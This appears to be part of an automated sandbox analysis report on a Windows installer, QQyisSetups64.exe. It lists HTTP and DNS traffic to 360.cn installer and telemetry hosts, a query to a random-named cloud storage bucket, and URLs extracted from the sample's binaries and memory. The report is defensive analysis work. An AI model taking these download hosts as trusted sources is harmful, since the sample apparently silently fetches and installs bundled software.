                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /360safe/h_inst.cab?rd=10788264 HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficDNS traffic detected: DNS query: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                          Source: global trafficDNS traffic detected: DNS query: s.360.cn
                          Source: global trafficDNS traffic detected: DNS query: st.p.360.cn
                          Source: global trafficDNS traffic detected: DNS query: tr.p.360.cn
                          Source: global trafficDNS traffic detected: DNS query: agt.p.360.cn
                          Source: global trafficDNS traffic detected: DNS query: agd.p.360.cn
                          Source: global trafficDNS traffic detected: DNS query: pinst.360.cn
                          Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://%s/%s.trt
                          Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://%s/%u%u.html
                          Source: inst.exeString found in binary or memory: http://%s/gf/360ini.cab
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab
                          Source: inst.exeString found in binary or memory: http://%s/wpad.dat
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://123.com/
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:
                          Source: inst.exe, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://360.cn
                          Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2576022298.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://agd.p.360.cn
                          Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C9F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1402669739.0000000003347000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2576898046.000002945F2A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                          Source: inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
                          Source: sites.dll.15.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                          Source: QQyisSetups64.exe, 00000003.00000002.1461469475.000000000363B000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                          Source: sites.dll.15.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://crl.globalsign.net/root.crl0
                          Source: powershell.exe, 0000000C.00000002.1436414735.000000000845E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microqz
                          Source: powershell.exe, 0000000D.00000002.1402669739.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: svchost.exe, 00000012.00000002.2576153550.000002945F200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                          Source: inst.exeString found in binary or memory: http://dl.360safe.com/gf/360ini.cab
                          Source: inst.exe, 0000000F.00000002.2574938376.00000000038AA000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1561420141.0000000008300000.00000004.00000800.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2556312311.0000000000396000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp, setup.ini.15.drString found in binary or memory: http://dl.360safe.com/setup_13.0.0.2008k.exe
                          Source: inst.exeString found in binary or memory: http://down.360safe.com/
                          Source: inst.exe, 0000000F.00000002.2574938376.00000000038AA000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1561420141.0000000008300000.00000004.00000800.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2556312311.0000000000396000.00000004.00000010.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573466841.000000000294F000.00000004.00000020.00020000.00000000.sdmp, setup.ini.15.drString found in binary or memory: http://down.360safe.com/360safe/slideshow_new.cab
                          Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://down.360safe.com/h11=
                          Source: inst.exeString found in binary or memory: http://down.360safe.com/setup.exe
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.drString found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
                          Source: inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://down.360safe.com/setup.exehttp://d
                          Source: inst.exe, 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmp, inst.exe, 0000000F.00000000.1438674426.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460442759.0000000000B58000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445103284.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
                          Source: inst.exe, 0000000F.00000000.1438674426.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460442759.0000000000B58000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445103284.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh
                          Source: inst.exeString found in binary or memory: http://down.360safe.com/setupbeta.exe
                          Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                          Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                          Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                          Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                          Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                          Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                          Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://hao.360.com
                          Source: inst.exe, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab
                          Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://ocsp.comodoca.com0
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                          Source: inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: sites.dll.15.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                          Source: QQyisSetups64.exe, 00000003.00000002.1461469475.000000000363B000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                          Source: inst.exeString found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php
                          Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://p.s.360.cn/p2p/p2sp_uplog.php0cpsign1md5b3deb21a3401d8e933ddcb45a6c07222
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://pinst.360.cn/360haohua/safe_chaoqiang.cab?
                          Source: inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab
                          Source: inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264
                          Source: inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264FK
                          Source: inst.exe, 0000000F.00000002.2575396513.0000000003AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264HTTP:XX-
                          Source: inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264Hl
                          Source: inst.exe, 0000000F.00000002.2576022298.0000000003F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab?rd=10788264XXQ
                          Source: inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cabrd=107882641K:
                          Source: inst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cab
                          Source: inst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cab
                          Source: inst.exeString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp
                          Source: inst.exeString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
                          Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefin
                          Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefi
                          Source: inst.exe, 0000000F.00000002.2559394305.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safef
                          Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.0000000002913000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safef
                          Source: inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safef
                          Source: inst.exe, 0000000F.00000003.1534492876.000000000293F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefi
                          Source: inst.exe, 0000000F.00000002.2559394305.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safef
                          Source: inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safef
                          Source: inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1533920373.0000000003891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefin
                          Source: inst.exe, 0000000F.00000002.2573218002.0000000002913000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1534492876.0000000002934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefi
                          Source: inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573466841.0000000002936000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safef
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://s.symcd.com06
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://s2.symcb.com0
                          Source: 360P2SP.dll.15.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000005214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
